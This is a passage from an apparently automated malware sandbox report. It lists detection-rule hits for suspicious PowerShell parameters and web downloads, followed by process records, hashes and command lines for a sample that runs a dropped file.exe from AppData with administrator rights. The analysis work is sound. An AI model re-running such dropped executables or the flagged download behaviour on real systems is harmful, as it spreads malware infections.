                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000012.00000002.953185169.00000000002BE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                  General

                  Target ID:19
                  Start time:05:35:09
                  Start date:18/03/2023
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
                  Imagebase:0x4a8e0000
                  File size:345088 bytes
                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Target ID:21
                  Start time:05:35:10
                  Start date:18/03/2023
                  Path:C:\Users\user\AppData\Roaming\file.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\file.exe
                  Imagebase:0x400000
                  File size:676320 bytes
                  MD5 hash:A1AFEF77EEC567ADB1076E8679AF207B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Target ID:22
                  Start time:05:35:36
                  Start date:18/03/2023
                  Path:C:\Windows\System32\verclsid.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                  Imagebase:0xff520000
                  File size:11776 bytes
                  MD5 hash:3796AE13F680D9239210513EDA590E86
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Target ID:23
                  Start time:05:35:38
                  Start date:18/03/2023
                  Path:C:\Windows\System32\notepad.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
                  Imagebase:0xffa70000
                  File size:193536 bytes
                  MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Disassembly

                  No disassembly